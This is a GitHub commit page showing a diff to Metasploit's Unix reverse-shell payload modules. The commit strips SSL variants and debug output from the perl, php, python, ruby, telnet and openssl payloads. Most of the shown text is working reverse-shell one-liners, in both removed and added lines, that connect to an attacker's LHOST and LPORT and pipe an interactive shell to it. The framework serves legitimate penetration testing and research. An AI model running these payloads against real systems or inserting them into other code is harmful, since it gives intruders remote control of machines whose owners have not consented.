Browse files

rev_tcp module cleanup:

restored pre-existing rev_tcp modules from upstream/master.
added reverse_php and reverse_python modules without SSL support
  • Loading branch information...
1 parent 05aa2a3 commit 4ced81e035516721803cee1f27489f6fee8fb123 RageLtMan committed Jun 9, 2012
View
28 modules/payloads/singles/cmd/unix/reverse.rb
@@ -21,13 +21,10 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
- 'Name' => 'Unix Command Shell, Double reverse TCP (telnet) or Double reverse SSL (openssl)',
+ 'Name' => 'Unix Command Shell, Double reverse TCP (telnet)',
'Version' => '$Revision$',
'Description' => 'Creates an interactive shell through two inbound connections',
- 'Author' => [
- 'hdm', # original module
- 'RageLtMan' # SSL patch
- ],
+ 'Author' => 'hdm',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
@@ -47,28 +44,19 @@ def initialize(info = {})
# Constructs the payload
#
def generate
- vprint_good(command_string)
return super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
- if datastore['SSL']
- # PoC for ssl shell implementation with SslTcpServer
- cmd = "sh -c '(openssl s_client -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" +
- "/bin/sh 2&>1|openssl s_client -connect #{datastore['LHOST']}:" +
- "#{datastore['LPORT']})'>/dev/null 2>&1 &"
- else
- cmd =
- "sh -c '(sleep #{3600+rand(1024)}|" +
- "telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
- "while : ; do sh && break; done 2>&1|" +
- "telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
- " >/dev/null 2>&1 &)'"
- end
-
+ cmd =
+ "sh -c '(sleep #{3600+rand(1024)}|" +
+ "telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
+ "while : ; do sh && break; done 2>&1|" +
+ "telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
+ " >/dev/null 2>&1 &)'"
return cmd
end
View
1 modules/payloads/singles/cmd/unix/reverse_bash.rb
@@ -49,7 +49,6 @@ def initialize(info = {})
# Constructs the payload
#
def generate
- vprint_good(command_string)
return super + command_string
end
View
8 modules/payloads/singles/cmd/unix/reverse_bash_telnet.rb
@@ -26,7 +26,7 @@ def initialize(info = {})
'Description' => %q{
Creates an interactive shell via mknod and telnet.
This method works on Debian and other systems compiled
- without /dev/tcp support. Telnet-ssl support included.
+ without /dev/tcp support.
},
'Author' => 'RageLtMan',
'License' => MSF_LICENSE,
@@ -57,10 +57,6 @@ def generate
#
def command_string
pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
- if datastore['SSLHandler']
- cmd = "mknod #{pipe_name} p && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
- else
- cmd = "mknod #{pipe_name} p && telnet #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
- end
+ cmd = "mknod #{pipe_name} p && telnet #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
end
end
View
1 modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -44,7 +44,6 @@ def initialize(info = {})
# Constructs the payload
#
def generate
- vprint_good(command_string)
return super + command_string
end
View
12 modules/payloads/singles/cmd/unix/reverse_perl.rb
@@ -23,8 +23,8 @@ def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP (via perl)',
'Version' => '$Revision$',
- 'Description' => 'Creates an interactive shell via perl, supports SSL',
- 'Author' => ['cazz', 'RageLtMan']
+ 'Description' => 'Creates an interactive shell via perl',
+ 'Author' => 'cazz',
'License' => BSD_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
@@ -44,7 +44,6 @@ def initialize(info = {})
# Constructs the payload
#
def generate
- vprint_good(command_string)
return super + command_string
end
@@ -55,12 +54,7 @@ def command_string
lhost = datastore['LHOST']
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- if datastore['SSLHandler']
- # Need a succinct way to determine when $c is closed from the framework side, this method is presently unsafe as it leaves the process hanging
- cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");while($c){sysread($c,$i,8192);syswrite($c,`$i`);}'"
- else
- cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
- end
+ cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
end
end
View
8 modules/payloads/singles/cmd/unix/reverse_php.rb
@@ -23,7 +23,7 @@ def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP (via php)',
'Version' => '$Revision$',
- 'Description' => 'Creates an interactive shell via php, supports SSL',
+ 'Description' => 'Creates an interactive shell via php',
'Author' => 'RageLtMan',
'License' => BSD_LICENSE,
'Platform' => 'unix',
@@ -55,11 +55,7 @@ def command_string
lhost = datastore['LHOST']
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- if datastore['SSLHandler']
- cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
- else
- cmd = "php -r '$s=fsockopen(\"#{datastore['LHOST']}\",#{datastore['LPORT']});exec(\"/bin/sh -i <&3 >&3 2>&3\");'&"
- end
+ cmd = "php -r '$s=fsockopen(\"#{datastore['LHOST']}\",#{datastore['LPORT']});exec(\"/bin/sh -i <&3 >&3 2>&3\");'&"
end
end
View
15 modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -23,7 +23,7 @@ def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP (via python)',
'Version' => '$Revision$',
- 'Description' => 'Creates an interactive shell via python, supports SSL, encodes with base64 by design.',
+ 'Description' => 'Creates an interactive shell via python, encodes with base64 by design.',
'Author' => 'RageLtMan',
'License' => BSD_LICENSE,
'Platform' => 'unix',
@@ -55,16 +55,9 @@ def command_string
cmd = ''
dead = Rex::Text.rand_text_alpha(2)
# Set up the socket
- if datastore['SSLHandler']
- cmd += "import socket,subprocess,os,ssl\n"
- cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
- cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
- cmd += "s=ssl.wrap_socket(so)\n"
- else
- cmd += "import socket,subprocess,os\n"
- cmd += "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
- cmd += "s.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
- end
+ cmd += "import socket,subprocess,os\n"
+ cmd += "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
+ cmd += "s.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
# The actual IO
cmd += "#{dead}=False\n"
cmd += "while not #{dead}:\n"
View
11 modules/payloads/singles/cmd/unix/reverse_ruby.rb
@@ -23,8 +23,8 @@ def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP (via Ruby)',
'Version' => '$Revision$',
- 'Description' => 'Connect back and create a command shell via Ruby, supports SSL',
- 'Author' => ['kris katterjohn', 'RageLtMan']
+ 'Description' => 'Connect back and create a command shell via Ruby',
+ 'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
@@ -37,17 +37,12 @@ def initialize(info = {})
end
def generate
- vprint_good(command_string)
return super + command_string
end
def command_string
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- if datastore['SSLHandler']
- "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'"
- else
- "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
- end
+ "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
end
end

0 comments on commit 4ced81e

Please sign in to comment.